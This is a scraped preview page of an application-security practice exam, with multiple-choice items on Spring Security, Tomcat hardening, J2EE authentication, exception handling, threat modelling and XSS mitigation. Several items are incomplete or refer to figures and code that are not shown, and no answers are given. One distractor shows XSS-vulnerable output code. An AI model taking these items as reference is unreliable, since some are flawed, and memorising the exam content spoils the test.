Which of the following Spring Security Framework configuration setting will ensure the protection from session fixation attacks by not allowing authenticated user to login again?
Asession-fixation-protection ="newSessionID"
Bsession-fixation-protection ="migrateSession"
Csession-fixation-protection ="enabled"
Dsession-fixation-protection ="protectSession"
0
Question 2
Secure Deployment and Maintenance
0
Question 3
Secure Deployment and Maintenance
0
Question 4
Secure Deployment and Maintenance
0
Question 5
Secure Coding Practices for Authentication and Authorization
0
That's the end of the Preview
This exam has 49 community-verified practice questions. Create a free account to access all questions, comments, and explanations.
Topics covered:
Understanding Application Security, Threats, and AttacksSecurity Requirements GatheringSecure Application Design and ArchitectureSecure Coding Practices for Input ValidationSecure Coding Practices for Authentication and AuthorizationSecure Coding Practices for CryptographySecure Coding Practices for Session ManagementSecure Coding Practices for Error HandlingStatic and Dynamic Application Security Testing (SAST & DAST)Secure Deployment and Maintenance
Oliver is a web server admin and wants to configure the Tomcat server in such a way that it should not serve index pages in the absence of welcome files. Which of the following settings in CATALINA_HOME/conf/ in web.xml will solve his problem?
Which of the following configuration settings in server.xml will allow Tomcat server administrator to impose limit on uploading file based on their size?
A< connector... maxFileLimit="file size" / >
B< connector... maxPostSize="0" / >
C< connector... maxFileSize="file size" / >
D< connector... maxPostSize="file size" / >
Which of the following authentication mechanism does J2EE support?
AWindows, Form based, Role Based, Client/Server Mutual Authentication
CHttp Basic, Form Based, Client/Server Mutual, Role Based Authentication
DHttp Basic, Form Based, Client/Server Mutual, HTTP Digest Authentication
Question 6
Secure Deployment and Maintenance
0
Question 7
Security Requirements Gathering
Question 8
Secure Deployment and Maintenance
Question 9
Secure Coding Practices for Error Handling
Question 10
Secure Coding Practices for Error Handling
Question 11
Security Requirements Gathering
Question 12
Secure Application Design and Architecture
Question 13
Secure Deployment and Maintenance
Question 14
Understanding Application Security, Threats, and Attacks
Question 15
Secure Coding Practices for Session Management
Question 16
Secure Coding Practices for Error Handling
Question 17
Secure Deployment and Maintenance
Question 18
Secure Application Design and Architecture
Question 19
Understanding Application Security, Threats, and Attacks
Question 20
Secure Coding Practices for Input Validation
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ad
Want a break from the ads?
Become a Supporter and enjoy a completely ad-free experience, plus unlock Learn Mode, Exam Mode, AstroTutor AI, and more.
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
Ask AstroTutor
0
To enable the struts validator on an application, which configuration setting should be applied in the struts validator configuration file?
Avalidate="true''
BIsNotvalidate="disabled"
CIsNotvalidate="false"
Dvalidate="enabled"
Which of the following can be derived from abuse cases to elicit security requirements for software system?
AMisuse cases
BData flow diagram
CUse cases
DSecurity use cases
Alice, a Server Administrator (Tomcat), wants to ensure that Tomcat can be shut down only by the user who owns the Tomcat process. Select the appropriate setting of the CATALINA_HOME/conf in server.xml that will enable him to do so.
A< server port="" shutdown="" >
B< server port="-1" shutdown="" >
C< server port="-1" shutdown="SHUTDOWN" >
D< server port="8080" shutdown="SHUTDOWN" >
James is a Java developer working INFR INC. He has written Java code to open a file, read it line by line and display its content in the text editor. He wants to ensure that any unhandled exception raised by the code should automatically close the opened file stream. Which of the following exception handling block should he use for the above purpose?
ATry-Catch-Finally block
BTry-Catch block
CTry-With-Resources block
DTry-Catch-Resources block
Identify what should NOT be catched while handling exceptions.
AEOFException
BSecurityException
CIllegalAccessException
DNullPointerException
Which of the following relationship is used to describe security use case scenario?
AThreatens Relationship
BExtend Relationship
CMitigates Relationship
DInclude Relationship
Which of the following DFD component is used to represent the change in privilege levels?
A3
B4
C1
D2
Alice, a security engineer, was performing security testing on the application. He found that users can view the website structure and file names. As per the standard security practices, this can pose a serious security risk as attackers can access hidden script files in your directory. Which of the following will mitigate the above security risk?
Which of the risk assessment model is used to rate the threats-based risk to the application during threat modeling process?
ADREAD
BSMART
CSTRIDE
DRED
Which line of the following example of Java Code can make application vulnerable to a session attack?
ALine No. 1
BLine No. 3
CLine No. 4
DLine No. 5
Which of the following method will help you check if DEBUG level is enabled?
AisDebugEnabled()
BEnableDebug ()
CIsEnableDebug ()
DDebugEnabled()
Which of the following elements in web.xml file ensures that cookies will be transmitted over an encrypted channel?
A< connector IsSSLEnabled="Yes" / >
B< connector EnableSSL="true" / >
C< connector SSLEnabled="false" / >
D< connector SSLEnabled="true" / >
In which phase of secure development lifecycle the threat modeling is performed?
ACoding phase
BTesting phase
CDeployment phase
DDesign phase
Identify the type of attack depicted in the figure below:
AXSS
BCross-Site Request Forgery (CSRF) attack
CSQL injection attack
DDenial-of-Service attack
Stephen is a web developer in the InterCall Systems. He was working on a Real Estate website for one of his clients. He was given a task to design a web page with properties search feature. He designed the following searchpage.jsp
< form Id="form1" method="post" action="SearchProperty.jsp" >
< input type="text" id=''txt_Search" name="txt_Search" placeholder="Search Property..." / >
< input type="Submit" Id="Btn_Search" value="Search" / >
< /form >
However, when the application went to security testing phase, the security tester found an XSS vulnerability on this page. How can he mitigate the XSS vulnerability on this page?
AHe should write code like out.Write ("You Searched for: " +ESAPI.encoder().encodeForHTML(search));
BHe should write code like out.write ("You Searched for: " + request.getParameter("search").toString());
CHe should write code like out.write ("You Searched for: " + request.getParameter("txt_Search"));
DHe should write code like out.write (("You Searched for: " +(search));
